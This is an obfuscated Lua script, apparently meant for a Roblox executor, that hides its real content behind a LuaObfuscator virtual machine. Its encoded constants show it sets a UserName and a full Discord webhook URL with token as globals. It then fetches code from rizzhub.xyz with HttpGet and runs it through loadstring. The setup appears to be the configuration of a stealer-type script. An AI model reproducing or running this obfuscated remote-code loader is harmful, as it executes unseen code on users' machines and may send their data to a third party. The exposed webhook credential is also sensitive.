--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v73=0;while true do if (v73==0) then v19=v0(v3(v30,1,1));return "";end end else local v74=v2(v0(v30,16));if v19 then local v79=0;local v80;while true do if (v79==1) then return v80;end if (v79==0) then v80=v5(v74,v19);v19=nil;v79=1;end end else return v74;end end end);local function v20(v31,v32,v33)if v33 then local v75=(v31/((1027 -(439 + 586))^(v32-(259 -(25 + 233)))))%((1 + 1)^(((v33-(1 -0)) -(v32-(1141 -(276 + 864)))) + 1 + (0 -0))) ;return v75-(v75%(3 -2)) ;else local v76=0 -0 ;local v77;while true do if (v76==(0 + 0)) then v77=2^(v32-(2 -(1 -0))) ;return (((v31%(v77 + v77))>=v77) and (894 -(486 + 407))) or (0 -0) ;end end end end local function v21()local v34=0 -(0 + 0) ;local v35;while true do if ((949 -(756 + 193))==v34) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=1647 -(1264 + 382) ;end if ((704 -(563 + 140))==v34) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (1037 -(261 + 774)) ;return (v37 * (57 + 199)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (11 -8) );v18=v18 + (6 -(1347 -(1236 + 109))) ;return (v41 * (16778016 -(235 + 565))) + (v40 * (12813 + 52723)) + (v39 * (115 + 141)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1853 -(605 + 1247) ,20) * ((1717 -((3790 -2700) + 625))^(594 -(109 + 453)))) + v42 ;local v46=v20(v43,21 + 0 ,1346 -((2039 -(1412 + 145)) + 833) );local v47=((v20(v43,1 + 31 )==(2 -1)) and  -(1 -0)) or (89 -(58 + 30)) ;if (v46==0) then if (v45==(41 -((86 -60) + 15))) then return v47 * (0 + 0) ;else local v81=(922 -(872 + 50)) + 0 ;while true do if (v81==0) then v46=542 -(390 + 151) ;v44=0 + 0 ;break;end end end elseif (v46==(53 + 1038 + 956)) then return ((v45==(0 + 0)) and (v47 * (1/0))) or (v47 * NaN) ;end return v8(v47,v46-(2183 -1160) ) * (v44 + (v45/((1 + 1)^52))) ;end local function v25(v48)local v49;if  not v48 then local v78=0 -0 ;while true do if (v78==((1977 -(1179 + 798)) + 0)) then v48=v23();if (v48==(582 -((182 -(94 + 28)) + 522))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1 -0) );v18=v18 + v48 ;local v50={};for v65=2 -1 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=(452 -(320 + 132))) then else v52=1141 -(717 + 424) ;v53=nil;v51=1;end if (v51~=1) then else v54=nil;v55=nil;v51=2;end if (v51~=(11 -8)) then else v58=nil;while true do local v82=0;local v83;while true do if (v82==0) then v83=716 -(176 + 540) ;while true do if (v83==(1858 -(971 + 886))) then if (v52==2) then local v103=0;while true do if (v103==(2 -1)) then for v116=3 -2 ,v23() do v55[v116]=v23();end return v56;end if (0==v103) then for v118=769 -(171 + 597) ,v23() do local v119=0;local v120;while true do if (v119==(1066 -(750 + 316))) then v120=v21();if (v20(v120,1,1)~=0) then else local v148=0 -0 ;local v149;local v150;local v151;local v152;local v153;local v154;while true do if (v148==3) then while true do if (v149~=0) then else local v161=1664 -(638 + 1026) ;while true do if (1~=v161) then else v149=1;break;end if (v161==0) then v150=0;v151=nil;v161=1 + 0 ;end end end if (v149~=(8 -6)) then else v154=nil;while true do if (v150~=(1263 -(1104 + 158))) then else local v166=0;local v167;while true do if (v166==(0 -0)) then v167=0 + 0 ;while true do if (v167~=(1442 -(831 + 610))) then else v150=4 -2 ;break;end if (v167~=(0 -0)) then else local v180=1416 -(942 + 474) ;while true do if (1==v180) then v167=1 + 0 ;break;end if (v180==(0 -0)) then v153=nil;v154=nil;v180=1;end end end end break;end end end if (v150==0) then local v168=0;local v169;while true do if (v168==0) then v169=0;while true do if (v169==(413 -(230 + 183))) then local v181=0;while true do if (v181~=(1451 -(87 + 1363))) then else v169=325 -(305 + 19) ;break;end if (0==v181) then v151=0;v152=nil;v181=1;end end end if (1~=v169) then else v150=2 -1 ;break;end end break;end end end if (v150==2) then while true do if (v151~=0) then else local v171=534 -(31 + 503) ;local v172;while true do if (v171==(0 -0)) then v172=0;while true do if (v172~=1) then else v151=1;break;end if (v172==(0 + 0)) then v152=v20(v120,2,3);v153=v20(v120,4,6);v172=1 + 0 ;end end break;end end end if (v151~=(1 + 1)) then else local v173=0;local v174;while true do if (v173~=(0 -0)) then else v174=0;while true do if (v174==0) then local v182=0 -0 ;while true do if (v182==1) then v174=1004 -(573 + 430) ;break;end if (v182==0) then if (v20(v153,559 -(175 + 383) ,1)==(1 + 0)) then v154[2]=v58[v154[368 -(302 + 64) ]];end if (v20(v153,2 + 0 ,293 -(242 + 49) )~=1) then else v154[869 -(589 + 277) ]=v58[v154[3]];end v182=1 + 0 ;end end end if (v174~=1) then else v151=445 -(171 + 271) ;break;end end break;end end end if (v151==(498 -(181 + 316))) then local v175=0 -0 ;local v176;while true do if (v175==0) then v176=611 -(55 + 556) ;while true do if (v176~=1) then else v151=5 -3 ;break;end if (v176==0) then v154={v22(),v22(),nil,nil};if (v152==0) then local v183=0 -0 ;while true do if ((1202 -(178 + 1024))==v183) then v154[3]=v22();v154[4]=v22();break;end end elseif (v152==(1 + 0)) then v154[3]=v23();elseif (v152==(1612 -(1391 + 219))) then v154[2 + 1 ]=v23() -((5 -3)^16) ;elseif (v152~=3) then else local v192=153 -(123 + 30) ;local v193;while true do if (0==v192) then v193=0 + 0 ;while true do if (v193==(0 + 0)) then v154[3]=v23() -(2^(40 -24)) ;v154[4]=v22();break;end end break;end end end v176=1 -0 ;end end break;end end end if (3==v151) then if (v20(v153,7 -4 ,510 -(44 + 463) )~=1) then else v154[4]=v58[v154[4]];end v53[v118]=v154;break;end end break;end end break;end if (v149==(1337 -(1040 + 296))) then v152=nil;v153=nil;v149=2;end end break;end if ((809 -(651 + 157))==v148) then v151=nil;v152=nil;v148=4 -2 ;end if (v148==(3 -1)) then v153=nil;v154=nil;v148=3;end if (v148==(0 + 0)) then v149=0 + 0 ;v150=nil;v148=2 -1 ;end end end break;end end end for v121=615 -(570 + 44) ,v23() do v54[v121-1 ]=v28();end v103=1 + 0 ;end end end break;end if (v83==0) then local v102=0;while true do if (v102~=1) then else v83=1;break;end if (v102==(0 -0)) then if (v52==1) then local v106=0 -0 ;while true do if (v106~=2) then else v52=3 -1 ;break;end if ((321 -(128 + 192))~=v106) then else for v135=1,v57 do local v136=0 -0 ;local v137;local v138;local v139;local v140;while true do if (v136==2) then while true do if (v137~=(1 -0)) then else v140=nil;while true do if (v138==1) then if (v139==1) then v140=v21()~=(791 -(444 + 347)) ;elseif (v139==2) then v140=v24();elseif (v139~=3) then else v140=v25();end v58[v135]=v140;break;end if (v138~=(1599 -(1303 + 296))) then else local v163=0;while true do if (v163==0) then local v170=0 -0 ;while true do if (v170~=1) then else v163=1 + 0 ;break;end if (v170==(0 + 0)) then v139=v21();v140=nil;v170=1 + 0 ;end end end if (v163==1) then v138=1;break;end end end end break;end if (v137==0) then v138=1049 -(563 + 486) ;v139=nil;v137=1;end end break;end if (v136==(1 + 0)) then v139=nil;v140=nil;v136=2;end if (v136~=(475 -(116 + 359))) then else v137=1798 -(1660 + 138) ;v138=nil;v136=1;end end end v56[1628 -(1415 + 210) ]=v21();v106=2;end if (v106~=(0 -0)) then else v57=v23();v58={};v106=965 -(76 + 888) ;end end end if (v52~=0) then else v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=637 -(496 + 140) ;end v102=1793 -(416 + 1376) ;end end end end break;end end end break;end if ((2 + 0)==v51) then v56=nil;v57=nil;v51=1 + 2 ;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=0;local v68;local v69;local v70;local v71;local v72;while true do if (v67==1) then v70={...};v71=v12("#",...) -1 ;v67=2;end if (v67==3) then A,B=v27(v11(v72));if  not A[1] then local v94=v59[4][v68] or "?" ;error("Script error at ["   .. v94   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v67==2) then v72=nil;function v72()local v84=v62;local v85=v63;local v86=v64;local v87=v27;local v88={};local v89={};local v90={};for v95=(0 -0) + 0 ,v71 do if (((4485 -2640)>(1685 -714)) and (v95>=v86)) then v88[v95-v86 ]=v70[v95 + (133 -(75 + 57)) ];else v90[v95]=v70[v95 + 1 + 0 ];end end local v91=(v71-v86) + (298 -(75 + 222)) ;local v92;local v93;while true do local v96=1441 -(429 + 1012) ;while true do if ((v96==(1 + 0 + 0)) or ((2960 -913)<(147 + 1056))) then if ((v93<=(337 -(27 + 306))) or (1431==(3467 -920))) then if (((1393 + 1100)<((4234 -(207 + 82)) -(533 + 670))) and (v93<=(2 -1))) then if ((v93==(0 -0)) or ((2107 -((1004 -663) + 1260))>(70 + 462))) then if ((((2406 -(1100 + 105)) + 3594)>=(4581 -(361 + 144))) and (v90[v92[1 + 1 ]]==v92[1509 -(147 + 1358) ])) then v68=v68 + (2 -1) ;else v68=v92[6 -3 ];end else v90[v92[(8 -6) + 0 ]]=v92[3];end elseif (((3199 -1491)==(1234 + 474)) and (v93<=(1672 -(1495 + 98 + 77)))) then do return;end elseif ((v93>(5 -2)) or ((1915 -(760 + 339))>(5269 -(943 + 102 + 833)))) then v90[v92[4 -2 ]]=v61[v92[1456 -(669 + 784) ]];else v90[v92[1 + 1 ]]();end elseif (((2430 + 1036 + 993)==(7910 -3451)) and (v93<=(7 + 0))) then if (((5799 -(1224 + 406))>=(86 + 465)) and (v93<=(1734 -(1560 + 169)))) then local v109=0 -0 ;local v110;local v111;local v112;local v113;local v114;while true do if ((v109==(241 -(64 + 177))) or ((1091 + 734 + 872)<=((5477 -(481 + 778)) -1928))) then v110=36 -(28 + (17 -9)) ;v111=nil;v109=(1835 -(1590 + 244)) -0 ;end if (((12 -(9 + 2))==v109) or ((3065 -(346 + 302 + 699))>(843 + 1289))) then v112=nil;v113=nil;v109=1 + 1 ;end if (((3897 -(240 + 23))>=(4837 -3814)) and (v109==(3 -1))) then v114=nil;while true do if (((825 + 878)<=((4047 -(478 + 388)) -1248)) and ((3 -1)==v110)) then for v157=v111,v69 do local v158=0;local v159;while true do if (((1522 + 430)<(5163 -((1577 -(206 + 896)) + 539))) and (v158==(0 -0))) then v159=0 -0 ;while true do if (((20 + 160)<((2171 -1435) + 858)) and (v159==(0 -0))) then v114=v114 + 1 + 0 ;v90[v157]=v112[v114];break;end end break;end end end break;end if (((3780 -2179)>=(143 -(255 -(82 + 81)))) and ((0 + 0)==v110)) then local v155=0 + (0 -0) ;while true do if ((v155==(1029 -(882 + 147))) or (4266>(5885 -(352 + 1011)))) then v111=v92[(25 -18) -(4 + 1) ];v112,v113=v87(v90[v111](v13(v90,v111 + (3 -2) ,v92[9 -6 ])));v155=1;end if (((641 -(294 + 346))==v155) or (((3211 + 5980) -7216)<=(4022 -2626))) then v110=26 -(22 + 3) ;break;end end end if (((1275 -305)<(1522 + 625)) and (v110==1)) then local v156=0 -0 ;while true do if ((v156==(1 + (940 -(191 + 749)))) or ((6983 -(4922 -(576 + 141)))==(272 + 4288))) then v110=(23 -18) -3 ;break;end if (((0 -(781 -(770 + 11)))==v156) or ((1522 + 664)<=(868 + 537))) then v69=(v113 + v111) -(1791 -(1587 + 203)) ;v114=1990 -(1822 + 168) ;v156=(100 -(18 + 80)) -1 ;end end end end break;end end elseif ((((841 -606) + 3367)<(11223 -7507)) and (v93==(3 + 3))) then local v126=0 -0 ;local v127;local v128;while true do if ((((3795 -(88 + 773)) -(9 + 14 + 3))>=(2353 + 522)) and (v126==(0 + 0))) then v127=v92[784 -(404 + 378) ];v128=v90[v92[13 -10 ]];v126=3 -2 ;end if ((v126==(2 -(211 -(188 + 22)))) or (((2280 -(69 + 60)) -(283 + 314))>(4692 -(1018 + 265)))) then v90[v127 + (1338 -(59 + 40 + 1238)) ]=v128;v90[v127]=v128[v92[9 -5 ]];break;end end else local v129=0 + 0 ;local v130;while true do if ((v129==(1249 -(256 + 993))) or ((15146 -11053)<=((1977 -(43 + 595)) -699))) then v130=v92[1 + 1 ];v90[v130]=v90[v130](v13(v90,v130 + (3 -2) ,v69));break;end end end elseif ((v93<=(278 -(66 + (1123 -(449 + 470))))) or ((518 + 0)>=(3058 -(1315 + 466)))) then v90[v92[2 + 0 ]]=v92[1763 -(42 + 1718) ]~=(0 -0) ;elseif ((v93==(24 -15)) or ((7 + 1301)==(1629 -(274 + 566)))) then v61[v92[121 -(100 + 18) ]]=v90[v92[1102 -(261 + 839) ]];else v68=v92[3 + 0 ];end v68=v68 + 1 + 0 ;break;end if ((v96==(0 -0)) or ((12850 -9083)<=(1554 + (4785 -2754)))) then local v101=118 -(48 + 70) ;while true do if (((18762 -(6394 + 7640))>=(4862 -3691)) and (v101==(668 -((1163 -805) + (719 -410))))) then v96=(290 -(232 + 57)) + 0 ;break;end if ((v101==(0 -(0 + 0))) or ((5164 -2161)<(2328 -(316 + 279)))) then v92=v84[v68];v93=v92[1031 -(866 + 164) ];v101=1956 -(904 + 1051) ;end end end end end end v67=3;end if (0==v67) then v68=1;v69= -1;v67=1;end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C756103083O00557365724E616D6503093O004F6E6C794C6966656103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039363230353137383034383336342O37342F65413634756C7132624F314A6B4D635F4858333133454676494D5862466A676673685A5F4B636B697A4C746F5447316A646733577A545A5F642O634C54752O304F5F543000153O0012013O00013O00264O000C0001000200040A3O000C0001001204000100033O001204000200043O002006000200020005001201000400064O0008000500014O0005000200054O000700013O00022O000300010001000100040A3O0014000100264O00010001000100040A3O00010001001201000100083O001209000100073O0012010001000A3O001209000100093O0012013O00023O00040A3O000100012O00023O00017O00153O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
